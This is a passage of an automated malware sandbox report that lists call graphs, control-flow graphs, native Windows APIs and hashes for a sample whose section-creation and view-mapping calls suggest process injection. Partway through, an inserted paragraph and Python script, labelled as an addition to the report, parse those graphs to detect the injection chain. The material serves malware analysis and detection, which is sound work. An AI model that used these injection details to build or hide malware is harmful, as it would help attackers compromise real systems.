2b3d36f 106047 2b4a6b0 106042->106047 106043 2b44a50 8 API calls 106045 2b3f759 106043->106045 106045->106042 106045->106043 106046 2b4bd90 2 API 
calls 106045->106046 106058 2b3f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 106045->106058 106046->106045 106048 2b4af30 LdrLoadDll 106047->106048 106049 2b4a6cf CreateProcessInternalW 106048->106049 106049->106036 106050->106037 106052 2b3829f 106051->106052 106053 2b381b5 106051->106053 106052->106045 106053->106052 106054 2b44a50 8 API calls 106053->106054 106056 2b38222 106054->106056 106055 2b38249 106055->106045 106056->106055 106057 2b4bd90 2 API calls 106056->106057 106057->106055 106058->106045 106060 2b44e50 LdrLoadDll 106059->106060 106061 2b3f6ef 106060->106061 106062 2b3f6f6 SetErrorMode 106061->106062 106063 2b3f6fd 106061->106063 106062->106063 106063->105990 106078 2b3f4a0 106064->106078 106066 2b443c6 106066->105992 106068 2b38ab6 106067->106068 106069 2b4bd10 2 API calls 106068->106069 106072 2b38ad5 106069->106072 106070 2b38cea 106070->105995 106072->106070 106097 2b49850 106072->106097 106074 2b3f683 106073->106074 106145 2b49e60 106074->106145 106077->106002 106079 2b3f4bd 106078->106079 106085 2b49f90 106079->106085 106082 2b3f505 106082->106066 106086 2b4af30 LdrLoadDll 106085->106086 106087 2b49fac 106086->106087 106095 4d82f30 LdrInitializeThunk 106087->106095 106088 2b3f4fe 106088->106082 106090 2b49fe0 106088->106090 106091 2b4af30 LdrLoadDll 106090->106091 106092 2b49ffc 106091->106092 106096 4d82d10 LdrInitializeThunk 106092->106096 106093 2b3f52e 106093->106066 106095->106088 106096->106093 106098 2b4bf60 2 API calls 106097->106098 106099 2b49867 106098->106099 106118 2b39310 106099->106118 106101 2b49882 106102 2b498c0 106101->106102 106103 2b498a9 106101->106103 106106 2b4bd10 2 API calls 106102->106106 106104 2b4bd90 2 API calls 106103->106104 106105 2b498b6 106104->106105 106105->106070 106107 2b498fa 106106->106107 106108 2b4bd10 2 API calls 106107->106108 106109 2b49913 106108->106109 106115 2b49bb4 106109->106115 106124 2b4bd50 LdrLoadDll 106109->106124 106111 2b49b99 106112 2b49ba0 106111->106112 106111->106115 
106113 2b4bd90 2 API calls 106112->106113 106114 2b49baa 106113->106114 106114->106070 106116 2b4bd90 2 API calls 106115->106116 106117 2b49c09 106116->106117 106117->106070 106119 2b39335 106118->106119 106120 2b3acf0 LdrLoadDll 106119->106120 106121 2b39368 106120->106121 106123 2b3938d 106121->106123 106125 2b3cf20 106121->106125 106123->106101 106124->106111 106126 2b3cf4c 106125->106126 106127 2b4a1b0 LdrLoadDll 106126->106127 106128 2b3cf65 106127->106128 106129 2b3cf6c 106128->106129 106136 2b4a1f0 106128->106136 106129->106123 106133 2b3cfa7 106134 2b4a460 2 API calls 106133->106134 106135 2b3cfca 106134->106135 106135->106123 106137 2b4af30 LdrLoadDll 106136->106137 106138 2b4a20c 106137->106138 106144 4d82ca0 LdrInitializeThunk 106138->106144 106139 2b3cf8f 106139->106129 106141 2b4a7e0 106139->106141 106142 2b4af30 LdrLoadDll 106141->106142 106143 2b4a7ff 106142->106143 106143->106133 106144->106139 106146 2b4af30 LdrLoadDll 106145->106146 106147 2b49e7c 106146->106147 106150 4d82dd0 LdrInitializeThunk 106147->106150 106148 2b3f6ae 106148->106002 106150->106148

                                  Control-flow Graph

                                  APIs
                                  • NtQueryInformationProcess.NTDLL ref: 04B1A19F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519141738.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4b10000_control.jbxd
                                  Similarity
                                  • API ID: InformationProcessQuery
                                  • String ID: 0
                                  • API String ID: 1778838933-4108050209
                                  • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                  • Instruction ID: 781fc6d401bfbd6ab8094a3b06e0da93eb058276764e87fb69980ce2e8f14387
                                  • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                  • Instruction Fuzzy Hash: 29F11370518A8C8FDB69EF68C894AEEB7E4FF98304F80466AD44ED7250DF34A645CB41

                                  Control-flow Graph

                                  control_flow_graph 207 4b19baf-4b19bef 208 4b19bf7-4b19bfe 207->208 209 4b19bf2 call 4b19102 207->209 210 4b19c00 208->210 211 4b19c0c-4b19c9a call 4b1b942 * 2 NtCreateSection 208->211 209->208 212 4b19c02-4b19c0a 210->212 217 4b19ca0-4b19d0a call 4b1b942 NtMapViewOfSection 211->217 218 4b19d5a-4b19d68 211->218 212->211 212->212 221 4b19d52 217->221 222 4b19d0c-4b19d4c 217->222 221->218 224 4b19d69-4b19d6b 222->224 225 4b19d4e-4b19d4f 222->225 226 4b19d88-4b19ddc call 4b1cd62 NtClose 224->226 227 4b19d6d-4b19d72 224->227 225->221 228 4b19d74-4b19d86 call 4b19172 227->228 228->226
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519141738.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4b10000_control.jbxd
                                  Similarity
                                  • API ID: Section$CloseCreateView
                                  • String ID: @$@
                                  • API String ID: 1133238012-149943524
                                  • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                  • Instruction ID: 31e349a0998be71fc94a11e8ad4c50bd032ae52171df7bbab6093000093ae220
                                  • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                  • Instruction Fuzzy Hash: 2E61A27011CB488FDB58DF58D8956AABBE0FF98314F50062EE58AC3251DF35E441CB86

                                  Control-flow Graph

                                  control_flow_graph 267 4b19bb2-4b19bfe call 4b19102 270 4b19c00 267->270 271 4b19c0c-4b19c9a call 4b1b942 * 2 NtCreateSection 267->271 272 4b19c02-4b19c0a 270->272 277 4b19ca0-4b19d0a call 4b1b942 NtMapViewOfSection 271->277 278 4b19d5a-4b19d68 271->278 272->271 272->272 281 4b19d52 277->281 282 4b19d0c-4b19d4c 277->282 281->278 284 4b19d69-4b19d6b 282->284 285 4b19d4e-4b19d4f 282->285 286 4b19d88-4b19ddc call 4b1cd62 NtClose 284->286 287 4b19d6d-4b19d72 284->287 285->281 288 4b19d74-4b19d86 call 4b19172 287->288 288->286
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519141738.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4b10000_control.jbxd
                                  Similarity
                                  • API ID: Section$CreateView
                                  • String ID: @$@
                                  • API String ID: 1585966358-149943524
                                  • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                  • Instruction ID: 7ed9591ae6536149dd1747c8b3e46b57ef253d0a1feabc6b7b51861f4d4275b4
                                  • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                  • Instruction Fuzzy Hash: F5517FB0618B488FDB58DF18D8956AABBE0FB98314F50062EE58AC3651DF35E441CB86
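The two control-flow graphs above record the same basic-block sequence in the function at 4b19baf/4b19bb2: a block calling NtCreateSection, a successor calling NtMapViewOfSection, and a later block calling NtClose. That ordering is the section-mapping primitive (create a section, map a view of it, drop the handle); the graph alone does not show which process handle the view is mapped into, so it should be read together with the injection signatures elsewhere in this report. As an added example, not part of the Joe Sandbox report, the following Python parses the report's control_flow_graph text into nodes and edges and then checks that the chain is actually connected along graph edges rather than merely co-occurring in the function. The first sample input is the graph printed above, copied token for token; the second is a constructed negative case; the helper names parse_cfg, reaches, find_api_chain, apis_called and scan are my own.

```python
"""Parse Joe Sandbox 'control_flow_graph' text and check ordered API chains."""
import re
from collections import deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]+$")
NOISE = {"API"}  # appears in "N API calls" summaries, not an import name

# Section-mapping chain: create a section, map a view of it, close the handle.
SECTION_MAP_CHAIN = ("NtCreateSection", "NtMapViewOfSection", "NtClose")

# Sample input: the basic-block graph of the function at 4b19bb2 exactly as
# the report above prints it (tokens copied from the page).
CFG_SAMPLE = (
    "control_flow_graph 267 4b19bb2-4b19bfe call 4b19102 270 4b19c00 267->270 "
    "271 4b19c0c-4b19c9a call 4b1b942 * 2 NtCreateSection 267->271 "
    "272 4b19c02-4b19c0a 270->272 277 4b19ca0-4b19d0a call 4b1b942 "
    "NtMapViewOfSection 271->277 278 4b19d5a-4b19d68 271->278 272->271 272->272 "
    "281 4b19d52 277->281 282 4b19d0c-4b19d4c 277->282 281->278 "
    "284 4b19d69-4b19d6b 282->284 285 4b19d4e-4b19d4f 282->285 "
    "286 4b19d88-4b19ddc call 4b1cd62 NtClose 284->286 287 4b19d6d-4b19d72 284->287 "
    "285->281 288 4b19d74-4b19d86 call 4b19172 287->288 288->286"
)

# Constructed negative case: both APIs are present, but the mapping block is
# not reachable from the block that creates the section.
CFG_NEGATIVE = (
    "control_flow_graph 1 400000-400010 NtMapViewOfSection "
    "2 400020-400030 NtCreateSection 1->2"
)


def parse_cfg(text):
    """Return (nodes, edges) for one control_flow_graph line.

    nodes: id -> {"range": "start-end", "calls": [callee addr...], "apis": [name...]}
    edges: id -> set of successor ids
    """
    toks = text.split()
    nodes, edges, cur, i = {}, {}, None, 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.setdefault(m.group(1), set()).add(m.group(2))
            i += 1
        elif tok.isdigit() and i + 1 < len(toks) and ADDR_RE.match(toks[i + 1]):
            cur = tok                                   # "<id> <addr or range>"
            nodes[cur] = {"range": toks[i + 1], "calls": [], "apis": []}
            i += 2
        elif cur is None:
            i += 1                                      # leading label
        elif tok == "call" and i + 1 < len(toks):
            nodes[cur]["calls"].append(toks[i + 1])     # "call <callee>"
            i += 2
        elif tok == "*" and i + 1 < len(toks) and toks[i + 1].isdigit():
            # "call X * N": X is called N times from this block
            if nodes[cur]["calls"]:
                n = int(toks[i + 1])
                nodes[cur]["calls"].extend([nodes[cur]["calls"][-1]] * (n - 1))
            i += 2
        elif API_RE.match(tok) and tok not in NOISE:
            nodes[cur]["apis"].append(tok)              # imported API name
            i += 1
        else:
            i += 1
    return nodes, edges


def reaches(edges, src, dst):
    """Breadth-first search over block edges; src == dst counts as reachable."""
    seen, queue = {src}, deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            return True
        for s in edges.get(n, ()):
            if s not in seen:
                seen.add(s)
                queue.append(s)
    return False


def find_api_chain(nodes, edges, chain):
    """Block ids on which each API of `chain` is called, each reachable from the
    previous hit; None if the ordered chain is absent. Greedy: takes the first
    matching block in graph order, which is enough for the shapes seen here."""
    path, prev = [], None
    for api in chain:
        hit = next((n for n, d in nodes.items()
                    if api in d["apis"] and (prev is None or reaches(edges, prev, n))),
                   None)
        if hit is None:
            return None
        path.append(hit)
        prev = hit
    return path


def apis_called(nodes):
    """Sorted, de-duplicated list of every API named anywhere in the graph."""
    return sorted({a for d in nodes.values() for a in d["apis"]})


def scan(text, chain=SECTION_MAP_CHAIN):
    nodes, edges = parse_cfg(text)
    return {"apis": apis_called(nodes), "chain": find_api_chain(nodes, edges, chain)}


if __name__ == "__main__":
    print(scan(CFG_SAMPLE))    # chain found on blocks 271 -> 277 -> 286
    print(scan(CFG_NEGATIVE))  # both APIs present, chain is None
```

Running scan over the graph above returns the blocks 271, 277 and 286 for the three APIs, confirming the mapping follows the section creation along an actual execution path; the constructed negative graph lists both APIs but yields no chain, which is the case a plain import-name match would wrongly flag. The same parser also accepts the function-level call-graph format used elsewhere in this report ("N API calls" summaries are skipped as noise).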

                                  Control-flow Graph

                                  APIs
                                  • NtQueryInformationProcess.NTDLL ref: 04B1A19F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519141738.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4b10000_control.jbxd
                                  Similarity
                                  • API ID: InformationProcessQuery
                                  • String ID: 0
                                  • API String ID: 1778838933-4108050209
                                  • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                  • Instruction ID: 7342dac90c92f18c99ca802e69d9e0c8adca26b8674ce5292cf362a68ff802ee
                                  • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                  • Instruction Fuzzy Hash: 02512170918A8C8FDB69EF68C8946EEBBF4FB98305F40466ED44AD7250DF30A645CB41

                                  Control-flow Graph

                                  control_flow_graph 557 2b4a330-2b4a381 call 2b4af30 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02B44BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B44BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02B4A37D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: eaae1d25e7fbd2045330e6b15b0c80d505cb37fafc53f2ef3fd50df7ee3639ed
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: 79F0B2B2211208ABCB08DF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                  APIs
                                  • NtReadFile.NTDLL(02B44D72,5EB65239,FFFFFFFF,02B44A31,?,?,02B44D72,?,02B44A31,FFFFFFFF,5EB65239,02B44D72,?,00000000), ref: 02B4A425
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 5fce98419675b8150b1b35dccbc3d588d7963adaf1ac3962f032f5eb02082af7
                                  • Instruction ID: 96b28461775fce61bb4300e76e13b34246676944bffdc9ee7c1a7e9a1de7e8d7
                                  • Opcode Fuzzy Hash: 5fce98419675b8150b1b35dccbc3d588d7963adaf1ac3962f032f5eb02082af7
                                  • Instruction Fuzzy Hash: 580129B2210104ABDB14EF98CC94EEB77A9EF8C354F058689FE1D97251CA30E911CBA0
                                  APIs
                                  • NtReadFile.NTDLL(02B44D72,5EB65239,FFFFFFFF,02B44A31,?,?,02B44D72,?,02B44A31,FFFFFFFF,5EB65239,02B44D72,?,00000000), ref: 02B4A425
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: b7155526793d943480481d52a45f1602ad0be7fb4584f1a0b2c9d55fa521682a
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: C6F0B7B2210208AFDB14DF89DC90EEB77ADEF8C754F158249BE1D97241DA30E811CBA0
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B32D11,00002000,00003000,00000004), ref: 02B4A549
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: fcbfe56fc96be541f54301e3a91ee2ef91d9f4e318e870074bf64fa61209e785
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: B0F015B2210208ABDB14DF89CC80EEB77ADAF88754F118249BE0897241C630F811CBA0
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B32D11,00002000,00003000,00000004), ref: 02B4A549
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 5e53e5ce2ea3479e475aa3b7b5c40d77a45fece3a3a99e57839a720f9b609ce9
                                  • Instruction ID: 8f18f6b7def1d8a1c56050af3a2f1aeeee53e8b907b3876fdbb79fe7953718f1
                                  • Opcode Fuzzy Hash: 5e53e5ce2ea3479e475aa3b7b5c40d77a45fece3a3a99e57839a720f9b609ce9
                                  • Instruction Fuzzy Hash: C7F01CB6210108AFDB14DF99CC80EEB77A9AF88354F15824DFE0997241C630E811CBA0
                                  APIs
                                  • NtClose.NTDLL(02B44D50,?,?,02B44D50,00000000,FFFFFFFF), ref: 02B4A485
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2b30000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: b083345bcf0be7d0327492e2f62768a0ce9ae1ea1129846eec2e305298bb02bd
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 8ED01776250214ABE710EB98CC85EE77BADEF48760F154599BA189B242C930FA008BE0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
• Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 066b97016a746e425dc8c6638efe089d8e6561e715f554239b00b415b8d96dba
                                  • Instruction ID: e93d57fb6a4c7c65659cf8230d2fe00ec98f7171d21c9a6904cbfd2e9ac41c17
                                  • Opcode Fuzzy Hash: 066b97016a746e425dc8c6638efe089d8e6561e715f554239b00b415b8d96dba
                                  • Instruction Fuzzy Hash: 8790023121140402F7007598540864600558BE1705F55D011B502D665EC665DD917135
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
• Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d4f38b5698780f1fb1de0f3f58cf64f7eafc31934833e20118bce595e0687b04
                                  • Instruction ID: 444babd9454f1044ad6d2e3a2e74c55f6ea605a974ce883a5b176b55918f0dfb
                                  • Opcode Fuzzy Hash: d4f38b5698780f1fb1de0f3f58cf64f7eafc31934833e20118bce595e0687b04
                                  • Instruction Fuzzy Hash: 0090023121148802F7107158840474A00558BD1705F59C411B442D768D8695DD917125
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
• Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 21d04c4ca87d284c73c44020d8b31f5449afec4b14082520945e52cf6a798ace
                                  • Instruction ID: 0104df20b333723f97dce76321baaef37a17fbb6c22aa3914bb8c6fbd173accb
                                  • Opcode Fuzzy Hash: 21d04c4ca87d284c73c44020d8b31f5449afec4b14082520945e52cf6a798ace
                                  • Instruction Fuzzy Hash: EF90023121140842F70071584404B4600558BE1705F55C016B012D764D8615DD517525
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
• Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 007f53a5f67a67ffdd7e918dd5e33298c321d6cd35e32267dcc014ea9be2ec4a
                                  • Instruction ID: 44d50dda8bb5073525cc4648169151d38ad997e8a438adb9ac24907e41b2b830
                                  • Opcode Fuzzy Hash: 007f53a5f67a67ffdd7e918dd5e33298c321d6cd35e32267dcc014ea9be2ec4a
                                  • Instruction Fuzzy Hash: E8900221252441527B45B158440450740569BE1645795C012B141DA60C8526ED56E625
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
• Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 00a02686b5e17a1c46970b0d8ad1671f0b0cec2bc04faaaab3a5aef3e44685d8
                                  • Instruction ID: 9f2aa6387aebec8eaa5f61f13e9f323e2affe330e104d450dace8316d7fec606
                                  • Opcode Fuzzy Hash: 00a02686b5e17a1c46970b0d8ad1671f0b0cec2bc04faaaab3a5aef3e44685d8
                                  • Instruction Fuzzy Hash: CF90023121140413F7117158450470700598BD1645F95C412B042D668D9656DE52B125
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
• Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 28b6352ae569bde33e546b5e3fd126f54d8b485d66b969547303a2b83c8f240a
                                  • Instruction ID: b4610c2551742a6ca9eba68d8a86852864e94b63fb9a7fa26c8b972b6eb86309
                                  • Opcode Fuzzy Hash: 28b6352ae569bde33e546b5e3fd126f54d8b485d66b969547303a2b83c8f240a
                                  • Instruction Fuzzy Hash: 8C90022922340002F7807158540860A00558BD2606F95D415B001E668CC915DD696325
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 687ab681d094207d9ef190b7729f2f518e0e6629e0f86e74c974683fbfc539bd
                                  • Instruction ID: 65a16140e665ad63a52fe8999f3b31bd43633f77df23ac03b6e38a84199c2b6c
                                  • Opcode Fuzzy Hash: 687ab681d094207d9ef190b7729f2f518e0e6629e0f86e74c974683fbfc539bd
                                  • Instruction Fuzzy Hash: 9B90027121140402F7407158440474600558BD1705F55C011B506D664E8659DED57669
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 894c120c9397dcfed62150273ede9edd831f9e52f4b8c009943c3e7a3689d32f
                                  • Instruction ID: ddaf452579845ff707410a2fd4ebfb064b72e6ff97e2ff805980d716dbb8f8cc
                                  • Opcode Fuzzy Hash: 894c120c9397dcfed62150273ede9edd831f9e52f4b8c009943c3e7a3689d32f
                                  • Instruction Fuzzy Hash: 22900221221C0042F70075684C14B0700558BD1707F55C115B015D664CC915DD616525
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004E3D000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4d10000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 85ad68b13e03fa6a0a5bd620e9c424cf60337b3692c334acae7952859d2fe17a
                                  • Instruction ID: 97070105eb9129323744c2d22488c3d9edd72b3a56ce82b9dfabec8bc7b74f8e
                                  • Opcode Fuzzy Hash: 85ad68b13e03fa6a0a5bd620e9c424cf60337b3692c334acae7952859d2fe17a
                                  • Instruction Fuzzy Hash: 4490026135140442F70071584414B060055CBE2705F55C015F106D664D8619DD52712A
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: true
                                   • Associated: 00000008.00000002.4519339857.0000000004E39000.00000040.00001000.00020000.00000000.sdmp
